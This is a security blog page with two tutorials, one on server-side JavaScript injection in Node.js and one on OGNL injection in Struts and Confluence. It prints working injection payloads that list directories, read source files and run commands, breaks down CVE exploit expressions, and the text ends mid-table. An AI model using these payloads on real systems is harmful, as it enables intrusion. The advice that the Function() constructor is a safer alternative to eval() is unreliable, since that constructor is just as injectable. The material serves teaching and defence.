A Deep Dive into Server-Side JavaScript Injection (SSJI) Vulnerabilities

Hello readers! In this blog post, our Principal Consultant Rohit Misuriya and our Senior Consultant Aditya Raj Singh have discussed the infamous Server-Side JavaScript Injection (SSJI) vulnerability. The blog covers everything from the basics of Server-Side injection to possible attack vectors. They have explained the vulnerability, any prerequisites, attack vectors, how the vulnerability works in the background, recommendations, practice labs for hands-on experience, and more.

By the end of this article, you’ll have a solid understanding of SSJI attacks and the tools & techniques required to detect and exploit SSJI vulnerabilities. So, let’s dive into the world of SSJI!

TL;DR

  • SSJI occurs when an attacker injects malicious JavaScript into a web application’s server-side code. 
  • SSJI can lead to unauthorized data and system access, as well as allow attackers to perform attacks such as Remote Command Execution (RCE) and Server-Side Request Forgery (SSRF) in severe cases.
  • To prevent SSJI attacks, web developers should always validate and sanitise all user input, use input filtering to remove non-essential characters, and keep their web applications and libraries up-to-date to ensure they are not vulnerable to known security flaws.

Client-Side JavaScript Injection vs. Server-Side JavaScript Injection

Client-side and server-side JavaScript injection are two different types of security vulnerabilities, and each poses different risks to a web application. Now let us understand the differences between the two.

Client-Side JavaScript Injection Vulnerabilities

Client-Side JavaScript Injection vulnerabilities occur when an attacker is able to successfully inject a malicious JavaScript code into a web application, which then gets executed in the victim user’s browser. These vulnerabilities typically arise due to insufficient input validations that are implemented by the developers and inadequate security measures that are implemented on the client side. The injected code is executed within the context of the victim user’s browser, allowing the attacker to manipulate the behaviour of the web page, steal user data, and much more on behalf of the victim user without its consent.

There are several types of client-side JavaScript injection vulnerabilities, some of which are as follows:

  • Cross-site scripting (XSS) is the most common form of client-side JavaScript injection vulnerability. It occurs when an attacker is able to inject malicious scripts into a website, which are then executed by other users who visit the affected page. XSS vulnerabilities can be categorized as stored, reflected, or DOM-based, depending on how the malicious script is injected and executed.
  • Another similar type of vulnerability would be DOM (Document Object Model) Manipulation. When attackers can manipulate the DOM, which represents the structure of a web page, using malicious JavaScript. It can lead to various security risks, such as changing the appearance of the page a.k.a defacing, adding misleading information, redirecting users to attacker-controlled malicious websites, or harvesting sensitive information such as credentials.

Server-Side JavaScript Injection Vulnerabilities

Server-Side JavaScript Injection vulnerabilities, on the other hand, occur when an attacker is able to inject malicious JavaScript code into the server-side components or scripts, which gets executed on the server before the response is sent back to the client’s browser. Similar to Client-Side JavaScript Injection vulnerabilities these vulnerabilities also occur due to insufficient input validation and in addition poor coding practices on the server side. Compared to Client-Side JavaScript Injection vulnerabilities the Server-Side JavaScript Injection Vulnerabilities have comparatively serious consequences, as they allow attackers to manipulate the server’s behaviour and potentially gain unauthorized access to sensitive data or perform actions that the server that they are not allowed to do. Some of these vulnerabilities are explained below.

  • One such vulnerability is Server-Side Template Injection (SSTI) which occurs when an attacker is able to inject code into server-side templates that are then dynamically rendered to create a response. If not properly sanitized, these templates can execute the injected code, leading to data exposure or remote code execution on the server.
  • The other type of vulnerability and the one which we will be covering extensively in this blog is the Server-Side JavaScript Injection vulnerability. In cases where JavaScript is executed on the server side, attackers can attempt to inject malicious JavaScript code that the server will execute. This could lead to unauthorised access, data leaks, or other security breaches.

Server-Side JavaScript Injection (SSJI)

SSJI is a type of security vulnerability that occurs when an attacker can inject malicious JavaScript code into a web application’s server-side code. This can happen when the web application does not properly validate or sanitize user input, or when it relies on untrusted data from an external source. Once an attacker has successfully injected their code, it can then be executed on the server to steal sensitive data, manipulate server-side resources, or even take control of the entire web application. There are several ways in which SSJI can occur, including but not limited to the following:

  • An attacker can manipulate user input to inject JavaScript code into server-side scripts or templates, which will be executed on the server.
  • An attacker can manipulate HTTP headers the client sends to inject JavaScript code that will be executed on the server.
  • An attacker can manipulate query parameters sent to a server to inject JavaScript code that will be executed on the server.
  • An attacker can manipulate cookies sent to a server to inject JavaScript code that will be executed on the server.

An attacker can use multiple JavaScript functions to run malicious JavaScript code on the server, some of which are mentioned below:

  • eval()
  • setTimeout()
  • setInterval()
  • Function()

They are exposed if the input is not properly validated. For instance, using eval() to perform DoS (Denial of Service) will consume the entire CPU power. In essence, an attacker can also carry out or perform anything virtually on the system (within user permission limits). Once the attacker has successfully injected malicious code, it can then be used to perform a range of attacks, including but not limited to the following:

  • Persistent Cross-site scripting (XSS) attacks: The attacker can use the injected malicious JavaScript code on the Server-Side to steal sensitive information from the server, such as sensitive information stored on the server.
  • Server-side request forgery (SSRF) attacks: The attacker can use the injected malicious JavaScript code on the server side to manipulate server-side resources, such as databases or APIs, by sending unauthorized requests.
  • Remote code execution (RCE) attacks: The attacker can also use the injected malicious JavaScript code on the server side to execute arbitrary code on the server, which can then be leveraged to perform a complete takeover of the web server.

That was just the tip of the iceberg as both these attacks can have severe consequences. Now that we have developed a basic understanding of what SSJI is, let’s see a few examples along with some code snippets to understand how this vulnerability can be carried out.

SSJI via Node.js

Let us consider the following Node.js code snippet, which uses the eval() function to execute the user-supplied JavaScript code on the application server. In this example, the eval() function is used to execute the userInput value as JavaScript code on the server. This means that an attacker could potentially inject a malicious JavaScript code into the userInput value to execute arbitrary commands on the server. 

For example, an attacker could supply the following value for userInput and in the background server, this payload will use the child_process module of Node.js to execute the rm -rf /* command that deletes all files that are present on the application server:

SSJI via JavaScript

Let us consider the following server-side JavaScript code, which takes a user-supplied value as input and uses it to construct a MongoDB query in the back end:

In this example, the userInput variable is not properly validated/sanitized, which means that an attacker could potentially inject JavaScript code into the userInput value which can then be used to modify the underlying MongoDB query and execute arbitrary commands on the application server. For example, an attacker could inject the following value as user input to modify the underlying MongoDB query on the server-side and extract all the records available in the products collection that is available on the server-side:

The above-mentioned value would modify the query to include a JavaScript condition that always evaluates to true, effectively returning all records in the collection.

Let us take another example, Let’s consider a situation where a web application allows users to submit feedback that is later displayed in an administrator’s dashboard.

In this example, an attacker could identify that the application processes user feedback without proper validation which they can leverage to provide the following input as the feedback parameter:

The attacker’s input includes JavaScript code that uses the fs module to write a file named pwned.txt with the content “Hacked!” to the server’s filesystem. When the attacker’s input is processed by the server, the malicious JavaScript code is executed on the server side, and the file pwned.txt is created with the content that was specified by the attacker.

SSJI to SSRF

SSJI and SSRF are two different types of attacks, but they can be related in some cases and in some special circumstances can be chained together to increase the impact. SSJI can be used to carry out SSRF attacks by injecting malicious JavaScript code that requests a specific URL, which can then be leveraged to exploit vulnerabilities in the targeted system. Below is an example of how SSJI can be used to carry out an SSRF attack in a Node.js application:

In the above code snippet, the url parameter is taken from the end user as input and is then directly concatenated to the backend JavaScript, the response of which is then returned to the end user after getting processed on the server-side in the response body. An attacker could use this vulnerability to inject a URL that points to a vulnerable server, such as a local server, and exploit it using the server’s credentials. Below is an example payload that can be used by an attacker to exploit this vulnerability and carry out an SSRF attack:

In this example, the attacker has injected a URL that points to a local server that is running on port 8080 internally, which is accessible from the server that is vulnerable to SSJI. If the local server has any vulnerabilities, such as a weak authentication mechanism, the attacker could exploit it to gain access to sensitive information.

It should also be noted that SSRF may not be possible in every case, and the attacker might not be presented with the details every single time as the server will process the attacker’s input locally on the available services running on the target server.

SSJI to RCE

As we have seen in the previous examples it must now be clear that SSJI can be used as part of a larger attack, such as remote command execution (RCE), in which an attacker can execute arbitrary commands on the server by injecting malicious code into the web application’s server-side code. RCE attacks are typically carried out by exploiting vulnerabilities in the server-side code, such as unvalidated user input or poorly secured APIs, to inject malicious code. The attacker can then use the injected code to execute arbitrary commands on the server, such as reading or modifying files, creating or deleting user accounts, or even installing backdoors to maintain persistence on the server. Below is an example of how SSJI can be used to carry out an RCE attack:

Let us try to see how SSJI can be used to achieve RCE on an application. Consider the following Node.js code, which takes user-supplied input and uses the exec() function from the child_process module in the backend to execute a shell command on the server:

In this example, the userInput variable is not properly validated or sanitized, which means an attacker could potentially inject a malicious shell command into the userInput value to execute arbitrary commands on the server. For example, an attacker could supply the ’; ls /’ value for userInput to execute a command that lists all files on the server. This value would append a semicolon to the end of the user input, effectively terminating the current command and allowing the attacker to execute any additional commands they choose. The second command in this example lists all files in the root directory of the server.

An attacker could also supply the following value for userInput to execute a command that downloads and executes a malicious script on the server:

This value would use the wget command to download a malicious script from the attacker’s server, and then pipe the output to the sh command, which would execute the script. This could allow the attacker to take control of the server or access sensitive information.

To prevent this type of attack, developers should properly validate and sanitize all user input to ensure that it does not contain any untrusted or malicious code. Additionally, developers should avoid using unsafe functions like exec() to execute shell commands on the server, and should instead use safer alternatives like the spawn() function from the child_process module, which can help prevent injection attacks by providing separate arguments for the command and its arguments.

Interesting Real-World Scenarios

There have been several CVEs (Common Vulnerabilities and Exposures) in various web frameworks and libraries related to SSJI. The following are a few interesting CVEs associated with SSJI, along with details on how the CVE can be exploited in a real-world scenario:

SSJI to RCE in Paypal

Recently, an SSJI vulnerability was identified in a subdomain owned by Paypal. The researcher observed that the demo.paypal.com server responds differently to certain types of input. Specifically, it reacts differently to backslash (‘\‘) and newline (‘%0a‘) requests by throwing a ‘syntax error‘ in the responses. However, it responds with HTTP 200 OK for characters like single quotes, double quotes, and others. The security researcher performed some reconnaissance and identified that the PayPal Node.js application uses the Dust.js JavaScript templating engine on the server-side.

Upon investigating the source code of Dust.js on GitHub, the security researcher identified that the issue is related to the use of the “if” Dust.js helpers. In older versions of Dust.js, the “if” helpers are used for conditional evaluations. These helpers internally use JavaScript’s eval() function to evaluate complex expressions. The security researcher identified that the “if” helper’s eval() function is vulnerable to SSJI. The application takes user-provided input and applies html encoding to certain characters like single quotes () and double quotes (), making direct exploitation challenging. However, the security researcher finds that there is a vulnerability when the input parameter is treated as an array instead of a string. 

The following code snippet indicates the use of the eval function which is known to cause the SSJI vulnerabilities and is often time a potential attack vector.

The security researcher crafted the below-mentioned payload that leverages the vulnerability to execute arbitrary commands. By sending specific input like /etc/passwd to the demo application, they managed to exfiltrate sensitive information. The payload uses Node.js’s child_process.exec() to run the curl command and send the contents of the /etc/passwd file to an external server.

SSJI to RCE in Fastify

A Server-Side JavaScript Injection vulnerability in Fastify was reported a while back, allowing an attacker with control over a single property name in the serialization schema to achieve Remote Command Execution in the context of the web server. The security researcher found that Fastify was using fast-json-stingify to serialize the data in the response. This library was found to be vulnerable to Server-Side Injection which was leveraged to achieve Remote Code Execution. The submitted PoC exploit contained the following code.

The security researcher was able to demonstrate, using the above-mentioned exploit code, that the vulnerable library fast-json-stringify, which incorrectly handled the input, could be used by an adversary to perform RCE, which he was able to achieve successfully, as shown in the screenshot below.

This vulnerability was marked as a High-risk issue by the team and was patched shortly after that and appropriate mitigations were put in place to effectively handle this weakness by Fastify.

SSJI in Bassmaster Node.JS Plugin

A while ago, an SSJI vulnerability was found in the internals.batch function of the bassmaster plugin for the hapi server framework for Node.js via lib/batch.js file which allowed unauthenticated remote attackers to execute arbitrary Javascript code on the server side using an eval. This vulnerability was leveraged by adversaries on a huge scale to perform RCE on web applications that supported the bassmaster plugin. Shortly after this vulnerability was identified and the PoC exploits were made public a commit was made to the existing bassmaster plugin in which the following changes were made to effectively mitigate the discovered vulnerability.

SSJI in MongoDB

Recently, an SSJI vulnerability was identified in a MongoDB due to inadequate validation of the requests sent to the nativeHelper function in SpiderMonkey, which allowed the remote authenticated adversaries to perform a denial of service attack (invalid memory access and server crash) or execution of arbitrary code using a specially crafted memory address in the first argument. According to the publicly available PoC exploit of this vulnerability, the NativeFunction func comes from the x javascript object which is then called without any appropriate validation checks and results in a denial of service attack or execution of arbitrary code. The publicly available exploit for this vulnerability is as follows:

Practice Labs

As a group of seasoned penetration testers and security researchers, we firmly advocate for a practical, hands-on approach to cyber security. In line with this philosophy, we have recently released a lab on Server-Side Javascript Injection on our platform, Vulnmachines. Through our labs, readers can gain valuable insights into this vulnerability and its exploitation by simulating real-life scenarios, allowing for a deeper understanding of its implications.

In our lab on SSJI, you will come across a web application that allows users to search for phone numbers and ages by providing a first name or last name. However, the application has a critical vulnerability that enables attackers to exploit Server-Side JavaScript Injection, potentially leading to unauthorized access to sensitive information, such as file listings and source code.

The application features a search functionality that sends a GET request to the server with two parameters: q and SearchBy. The q parameter holds the search string, while the SearchBy parameter specifies the function to call, either firstName or lastName:

The SearchBy function in the server-side code is vulnerable to SSJI, which allows malicious users to inject JavaScript code into the SearchBy parameter. Unsafely handling user input exposes the application to potential attacks. An attacker can exploit this vulnerability by injecting SSJI payloads into the q parameter.

Constructing Payload to Fetch the Listing of Current Directory: 

One SSJI payload to fetch the listing of the current directory would be as follows: res.end(require(‘fs’).readdirSync(‘.’).toString()) 

This payload leverages the fs module in Node.js, allowing the attacker to execute file system operations. readdirSync retrieves the contents of the current directory (denoted by the dot ‘.‘), and toString() converts the resulting array to a string. The res.end() method is commonly used to send a response back to the client, in this case, containing the directory listing:

Fetching “app.js” Source Code: 

To retrieve the source code of the app.js file, attackers can use the following SSJI payload: res.end(require(‘fs’).readFileSync(“<PATH>”)) 

In this payload, the <PATH> placeholder should be replaced with the appropriate path to the app.js file on the server. By executing this payload, the attacker can obtain the source code of app.js, which contains the source code of the application and the flag for this lab:

Mitigations and Best Practices

To prevent this type of attack, developers should avoid using the eval() function and instead use safer alternatives, such as the Function() constructor or JSON parsing functions, to execute dynamic JavaScript code on the server. Additionally, all user input should be properly validated and sanitised to ensure that it does not contain any untrusted or malicious code. Here are some best practices to consider:

  • Validate all user input and external data, such as data from APIs, before using it in your application. Also, remove any characters or strings that could be used to inject malicious code. This can help prevent malicious code from being injected into your server-side code.
  • A defence-in-depth approach would be to use prepared statements in conjunction with parameterized queries, ensuring that the applications are not vulnerable to SQL injection attacks and also eliminating the possibility of performing SSJI attacks via SQLI.
  • Use security libraries and frameworks that provide input validation and sanitization functions. For example, many web frameworks have built-in functionality to prevent code injection attacks.
  • When rendering data in your application, use output encoding or escaping to prevent malicious code from being executed in the browser. This can help prevent cross-site scripting (XSS) attacks, which can be used to inject and execute malicious JavaScript code.
  • Restrict access to sensitive resources, such as server-side scripts and databases, to authorised users only. This can help prevent unauthorised access and manipulation of your resources.
  • Keep your web application software and frameworks up to date to ensure that you have the latest security patches and features.

By following these best practices, you can help prevent server-side JavaScript injection attacks and protect your web application from malicious actors.

Web Frameworks and Libraries for Preventing SSJI

Web frameworks and libraries play an important role in preventing server-side JavaScript injection attacks by providing built-in security features and guidelines that help developers write secure code. Many modern web frameworks, such as Express.js, provide features for securely handling user input, such as input validation and sanitization. These frameworks often have built-in security features that help prevent injection attacks, such as parameterized queries that can help prevent SQL injection attacks and built-in sanitization functions that can help prevent cross-site scripting (XSS) attacks.

Below is an example of how you can prevent server-side JavaScript injection in a Node.js application:

In this example, the userInput variable is first validated using a regular expression to ensure that it only contains alphanumeric characters. If the input fails the validation check, the server returns an error response and does not perform any further processing. If the input is valid, the userInput variable is then sanitised using a regular expression to remove any potentially malicious characters, such as quotes or backticks. This helps prevent injection attacks by ensuring that the input does not contain any code that could be executed on the server.

Finally, the sanitised user input is used to perform a safe operation, such as querying a database, and the results are returned to the client.

References

OGNL Injection Decoded

Hello readers! In this blog post, our Senior Consultant Aditya has discussed the infamous Object Graph Navigation Language (OGNL) injection vulnerability. He explains the vulnerability details, prerequisites, attack vectors, how the vulnerability works in the background, recommendations, practice labs, and more.

OGNL was introduced in 2002 and is widely used in Java-based web applications. It is a popular expression language, which allows you to access and manipulate objects in the application’s object graph. OGNL injection attacks have been a known issue for many years, and they have drawn the attention of security professionals since their discovery, due to the immense devastation that this particular family of vulnerability can cause. Now that we know what we’ll be talking about in this blog, let’s dive straight into the vulnerability know-hows.

TL;DR

  • An OGNL injection attack is a type of injection attack in which the attacker can execute arbitrary OGNL expressions on the server. This enables the attacker to gain unauthorized access to sensitive information, modify data, or engage in other malicious activities.
  • OGNL injection attacks are a potential threat to any application that uses OGNL expressions, and it is vital to take preventative measures such as proper input validation and escaping, as well as regular software and library updates.
  • A dedicated free practice lab relevant to the OGNL Injection vulnerability can be accessed by navigating to Vulnmachines.

Apache Struts Architecture

Apache Struts is a well-known open-source framework used to create Java-based web applications. It is based on the Model-View-Controller (MVC) design pattern, which divides the application into three distinct components: the model, the view, and the controller.

  • Model: The model represents the application’s data and business logic, and it is in charge of managing the data and performing any necessary calculations or operations.
  • View: The view is the application’s user interface, and it is responsible for displaying data and allowing the user to interact with the application.
  • Controller: The controller acts as a link between the model and the view, receiving user input, passing it to the model for processing, and then returning the resultant data to the view for display.

In Apache Struts applications, OGNL injection attacks occur when end-user input is not properly validated or escaped before being passed to an OGNL expression interpreter. In such cases, an attacker injects a malicious OGNL expression into the application, which is then executed on the server, granting the attacker unauthorized access to sensitive information and performing other harmful actions.

Expression and Expression Language

Expression

An expression is a combination or formula created from one or more constants, attributes, functions, and operators. This formula is calculated to determine an expression value which can then be used to provide extensive customization to different types of functionalities. When an expression is executed, it can read or set access to Java objects in its context, call methods, and execute arbitrary Java code. The values that an expression can output include Boolean, Float, Integers, Strings, and Timestamps. 

For example, a simple mathematical expression in the Java programming language might look like this:

This expression uses the '+' and '*' operators for conducting addition and multiplication on the numbers. When this expression is evaluated, it yields the value 14, which is then stored in the variable 'x'.

Expression Language

Expression Language is a specifically designed language that allows simple expressions to be used for dynamically accessing the application data within the web interface. An Expression Language can only be used in custom tags, not in core library tags. One of the key features of an Expression Language is that it allows the application’s developer to create attributes that can be changed based on the end users. This feature of the expression language provides the end user with a more enhanced and versatile user experience. Expression languages are frequently used to express conditions or transformations compactly and concisely. Expression languages are capable of specifying complex conditions or transformations simply and flexibly, eliminating the need for lengthy and verbose code.

The Apache Velocity template engine, for example, employs the Velocity Template Language (VTL) as its expression language. VTL enables developers to include expressions in their templates, which are then evaluated and replaced with the appropriate values at runtime. Here’s a simple VTL expression for displaying the current date and time:

This expression retrieves the current date and time from the '$date' object and then converts it to a string using the 'toString()' method. The resultant string is then assigned to the variable '$TSG', which is then displayed in the template. The VTL expression will be replaced with the current date and time when the template is rendered.

OGNL Injection

OGNL is an open-source expression language designed to make it easier for developers to extract data from object models in Java applications. The OGNL is pretty much identical to a server-side template and is widely used in Java Server Pages (JSP). The OGNL expression language allows you to get and set JavaBeans properties using Java reflection. An OGNL expression can execute Java class methods, and everything that can be done in Java can also be done in OGNL. Since OGNL can generate or modify executable code, it can introduce critical security flaws into any framework that uses it.

According to the OGNL’s official documentation, it offers its users several functionalities, such as:

  • OGNL expressions can be used to access the object properties.
  • OGNL not only allows users to use arrays, but it also allows them to access the array’s elements and perform operations on them using OGNL expressions, such as by combining the elements.
  • OGNL has a straightforward variable declaration scheme.

OGNL is capable of introducing critical security flaws into any framework that uses it due to its ability to create or change executable code. An attacker who successfully exploits this vulnerability can manipulate application functionality, recover sensitive server-side information available through implicit objects, and branch out into system code access, resulting in a server compromise.

Now, with the help of the following Apache Struts code, let us learn more about OGNL injection:

The ‘login’ method in this code snippet receives a 'username' and a 'password' from the end user and uses an OGNL expression to retrieve the corresponding 'User' object from the 'userService'. If the 'User' object is present and the password matches the intended user, the method returns "loginSuccess", otherwise, the method returns "loginFailed".

This code, however, is vulnerable to OGNL injection attacks. An attacker could create a malicious username that includes an OGNL expression that, when evaluated, allows the attacker to gain unauthorized access to sensitive information or perform other harmful actions. For instance, the attacker could use the username:

In this case, the login method would generate the OGNL expression:

On the server, this expression would be evaluated and would return the 'User' object with the username "adminfoo" Because the attacker has control over the username, they can modify it to avoid the password check and gain unauthorized access to the application.

To prevent this type of OGNL injection attack, the code was modified to include a 'validateAndEscapeUsername' method that validates and escapes the username parameter before it is passed to the 'userService'. The updated code is as follows:

The 'validateAndEscapeUsername' method can be implemented in a variety of ways, depending on the application’s specific requirements. It could, for example, use a regular expression match to ensure that the username only contains alphanumeric characters, or it could escape any special characters that may be used in OGNL expressions.

Here’s a simple example of how to use the 'validateAndEscapeUsername' method:

This method utilizes the 'replace' method to remove any single and double quotes, as well as square brackets, from the username. These characters are frequently used in OGNL expressions, and escaping them can aid in the prevention of OGNL injection attacks. The 'login' method is now protected against OGNL injection attacks by using the 'validateAndEscapeUsername' method. Because any special characters used in OGNL expressions are escaped and rendered harmless, an attacker would be unable to inject a malicious OGNL expression into the application.

Impact

Unlike the majority of injection vulnerabilities, the impact of OGNL injection is heavily dependent on the user’s privileges, when the OGNL expression is executed. Successful exploitation of the OGNL injection vulnerability, on the other hand, results in RCE, which jeopardizes the application’s confidentiality, integrity, and availability, making this vulnerability a complete nightmare for developers and blue team professionals. An attacker could also exploit this flaw to gain unauthorized access to the target application’s underlying data and functionality.

Detection

Although complex in nature, the OGNL Injection vulnerability is extremely simple to detect and can be found using the same method as searching for Server-Side Template Injection vulnerabilities, which occur when an attacker attempts to exploit a template syntax vulnerability to inject malicious code into the template engine either on the client-side or on the server-side. Template engines are used to generate dynamic content on a web page using a pre-defined syntax that in real-time substitutes values into a parameterized syntax template. A more well-known example of this vulnerability is the Jinja templating library in Python or Mustache for JavaScript, both of which are frequently vulnerable to Server-Side Template Injection (SSTI) vulnerabilities.

Several steps can be followed for manually detecting OGNL injection vulnerabilities in your application:

  1. Determine the input fields used in OGNL expressions since these are the primary attack vectors. This can include form fields, query parameters, and other user input sources.
  2. Build test inputs with special characters found in OGNL expressions, such as single and double quotes, square brackets, and dots.
  3. Submit the manufactured test inputs to the application’s user-controlled input fields and observe the application’s results and behavioural patterns.
  4. If the application appears to be vulnerable to OGNL injection, experiment with changing the test inputs to include more complex OGNL expressions, such as conditional statements and loops.
  5. If the application still appears to be vulnerable, try injecting OGNL expressions that could allow you to obtain unauthorized access to sensitive data or perform other harmful actions.

J2EEScan

Burp Suite’s BApp Store contains a plethora of Burp Extensions that can assist in identifying technology-specific vulnerabilities and performing specific types of attacks. J2EEScan is one such extension and is one of the finest Burp Suite extensions for detecting vulnerabilities in J2EE applications. According to the official documentation for this extension, it can detect over eighty different J2EE application vulnerabilities.

Interesting Real World Scenarios

Several instances of OGNL injection have been discovered over time by security experts around the world. Some of the most significant cases of OGNL Injection vulnerability are described below.

Confluence Pre-Auth Remote Code Execution via OGNL Injection (CVE-2022-26134)

A critical unauthenticated OGNL injection vulnerability was recently discovered in Atlassian Confluence Server and Data Center applications which allowed a remote attacker to execute arbitrary code on a Confluence Server or Data Center instance using specially crafted malicious OGNL expressions. Adversaries exploited this vulnerability on a large scale for malicious cryptocurrency mining, botnet creation, domain takeover of infrastructure, and the deployment of information stealers, remote access trojans (RATs), and ransomware.

Background:

Breaking down the payload and performing a thorough root cause analysis of the vulnerability revealed that the vulnerability operated in three major steps:

  • The remote attacker created a malicious HTTP GET request that included an OGNL expression that could or could not be platform-independent and sent it via the URI.
  • The malicious payload was executed, and the OGNL expression caused the injected command to be executed.
  • A custom HTTP response header was created that contained the output of the executed command and was visible in the response.

Detection and Exploitation:

This vulnerability is detectable and exploitable using a variety of publicly accessible exploits and scripts, some of which are listed below:

Malicious Request:

Intended Response:

Unencrypted Payload:

Payload Breakdown:

Payload SnippetDescription
#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(“hostname”).getInputStream(),”utf-8″)This payload snippet is used to execute the command, in this case, the 'hostname' command, and then convert it to a string, which is then stored in a variable for later use.
@com.opensymphony.webwork.ServletActionContext@getResponse()This payload snippet is used to obtain the response to the command that was executed.
setHeader(“X-Cmd-Response”,#a)This payload snippet is used to generate a custom HTTP response header, ‘X-Cmd-Response’, whose value is the output of the executed command.

This critical vulnerability was quickly patched, and the Atlassian team released a newer stable version that included the patch for this critical issue.

Confluence Server Webwork OGNL Injection (CVE-2021-26084)

A critical OGNL Injection vulnerability in Atlassian Confluence was discovered last year, allowing remote unauthenticated attackers to execute arbitrary code on the affected systems using malicious OGNL expressions via a specially crafted request. A thorough investigation of this vulnerability revealed that this vulnerability existed in the default configuration of the affected versions of the on-premises Confluence Server and Confluence Data Center products. Further exploration of the vulnerability revealed that Confluence already had an input validation mechanism in place, and the researcher who discovered this bug was able to successfully bypass the sanity checks and leveraged it for achieving remote code execution.

Background:

On performing the root cause analysis of this vulnerability it was discovered that the vulnerability operated in the following two stages:

  1. The attacker sent a specially crafted HTTP POST request impersonating an unauthenticated user to the Confluence Server that contained the malicious OGNL expression.
  2. The Confluence template engine evaluated the malicious POST request and executed the OGNL expression.

Detection and Exploitation:

This vulnerability is detectable and exploitable using a variety of publicly accessible exploits and scripts, some of which are listed below:

Some standard endpoints where this vulnerability can be identified in the affected version of on-premises Confluence Server and Confluence Data Center products are listed below based on an analysis of publicly available exploits:

Malicious Request:

Intended Response:

Unencrypted Payload:

Payload Breakdown:

Payload SnippetDescription
Class.forName(‘javax.script.ScriptEngineManager’).newInstance().getEngineByName(‘JavaScript’).eval(‘This payload snippet is used for creating an instance of JavaScript Engine which will be used for executing a small command.
var isWin = java.lang.System.getProperty(“os.name”).toLowerCase().contains(“win”);This payload snippet declares a variable that will attempt to execute the 'os.name' command, convert it to a lowercase string, and then look for the string "win" to determine a Windows-based environment.
var cmd = new java.lang.String(“hostname”);This payload snippet is used for creating a variable that holds the command as a String.
var p = new java.lang.ProcessBuilder();This payload snippet is used for creating an object of the Process Builder.
if(isWin){p.command(“cmd.exe”, “/c”, cmd); 
}
else{
p.command(“bash”, “-c”, cmd); 
}
This payload snippet is used to perform a conditional check and will execute the command based on the operating system architecture used by the target application.
p.redirectErrorStream(true);This payload snippet is used for redirecting the errors that might appear during the execution of the command.
var process= p.start();This payload snippet is used for calling the start function of the ProcessBuilder class.
var inputStreamReader = new java.io.InputStreamReader(process.getInputStream());This payload snippet is used for obtaining the input stream of the ProcessBuilder subprocess.
var bufferedReader = new java.io.BufferedReader(inputStreamReader);This payload snippet is used for reading the line-by-line data stream of the ProcessBuilder subprocess.
var line = “”; var output = “”;This payload snippet is used for declaring two empty string variables.
while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }’)This payload snippet is used to read the output line by line until the last character is not null and then convert it to a String.

The Atlassian team quickly patched this critical vulnerability and released a stable version that included the patch for this issue.

Apache Struts 2 Double OGNL Evaluation Vulnerability (CVE-2020-17530)

A forced double OGNL evaluation vulnerability in the Struts framework was discovered a while ago, which could allow an attacker to execute arbitrary code on the system using specially crafted OGNL expressions. When forced, the raw user input in tag attributes suffers a double evaluation utilizing the %{...} syntax, resulting in the evaluation of the injected malicious OGNL expressions.

A thorough examination of this vulnerability revealed that OGNL Injection does not exist in the default Apache Struts configuration and is totally dependent on how the application is configured by the developers. This means that the vulnerability is not included with Apache Struts, therefore a basic technology stack detection cannot be used to determine whether an application using the affected version is vulnerable.

Background:

This vulnerability worked in three stages:

  1. The developer had configured the application to perform forced OGNL evaluation using the %{..} syntax.
  2. A specially engineered OGNL expression string was inserted as raw user-provided input in a tag attribute, which the Struts framework interpreted as code, and the resulting string was evaluated as code once again.
  3. The malicious OGNL expression was interpreted, resulting in the execution of the injected malicious OGNL expression.

Detection and Exploitation:

This vulnerability is detectable and exploitable using a variety of publicly accessible exploits and scripts, some of which are listed below:

Malicious Request:

Intended Response:

Unencrypted Payload:

Payload Breakdown:

Payload SnippetDescription
#instancemanager=#application[“org.apache.tomcat.InstanceManager”]This payload snippet is used for creating an object manager.
#stack=#attr[“com.opensymphony.xwork2.util.ValueStack.ValueStack”]This payload snippet is used for creating a stack that can be used for storing multiple beans.
#bean=#instancemanager.newInstance(“org.apache.commons.collections.BeanMap”)This payload snippet is used for creating a BeanMap object of the bean.
#bean.setBean(#stack)This payload snippet is used for configuring the value stack of the bean.
#context=#bean.get(“context”)This payload snippet is used for obtaining the context of the bean.
#bean.setBean(#context)This payload snippet is used for configuring the context of the bean.
#macc=#bean.get(“memberAccess”)This payload snippet is used for obtaining access to the bean that allows access to sensitive data.
#bean.setBean(#macc)This payload snippet is used for configuring the access of the bean.
#emptyset=#instancemanager.newInstance(“java.util.HashSet”)This payload snippet is used for creating an object of an empty HashSet.
#bean.put(“excludedClasses”,#emptyset)This payload snippet is used for configuring the excluded classes to empty.
#bean.put(“excludedPackageNames”,#emptyset)This payload snippet is used for configuring the excluded packages to empty.
#arglist=#instancemanager.newInstance(“java.util.ArrayList”)This payload snippet is used for creating an ArrayList that will hold the arguments.
#arglist.add(“hostname”)This payload snippet is used for adding the ‘hostname’ command to the argument list.
#execute=#instancemanager.newInstance(“freemarker.template.utility.Execute”)This payload snippet is used for assigning a new object to execute.
#execute.exec(#arglist)This payload snippet is used for executing the values present in the ‘arglist’, which in this case was the ‘hostname’ command.

Though this vulnerability was discovered a few years ago, it is still discovered during internal network pentests and red team engagements. Having said that, an official patch for this vulnerability was released shortly after it was discovered.

Apache Struts Double OGNL Evaluation Vulnerability (CVE-2019-0230)

Apple Information Security team’s Matthias Kaiser discovered a critical unauthenticated OGNL remote code execution vulnerability in the Apache Struts web application framework due to improper handling of invalidated data, which resulted in a forced double OGNL expression execution when the OGNL expression was injected as raw user input in certain tag attributes such as ‘id’

Forced double OGNL evaluation vulnerability occurs when the Apache Struts framework attempts to interpret the raw user input included within the ‘tag’ attributes. As a result, in this situation, an adversary may send a malicious OGNL expression to the Struts framework, which would be evaluated again when the attributes of a tag were shown.

Although the Apache Struts software received input from an upstream element that specified the various characteristics, properties, or fields that were to be initialized or updated in an object, it does not correctly control which attributes could be modified. This attribute manipulation resulted in the dynamically-determined object attributes vulnerability, which in this case was an OGNL injection vulnerability.

Background:

This vulnerability worked in two stages:

  1. A specially constructed OGNL expression was introduced as an input in the tag attribute, which the Struts framework evaluated.
  2. The malicious OGNL expression was interpreted due to a lack of sufficient input validation, resulting in the execution of the injected malicious OGNL expression.

Detection and Exploitation:

This vulnerability is detectable and exploitable using a variety of publicly accessible exploits and scripts, some of which are listed below:

Malicious Request:

Intended Response:

Unencrypted Payload:

Payload Breakdown:

Payload SnippetDescription
#_memberAccess.allowPrivateAccess=trueThis payload snippet enables access to the private method that allows access to sensitive data.
#_memberAccess.allowStaticMethodAccess=trueThis payload snippet enables the static method access which disables protection against access and allows calls to static methods.
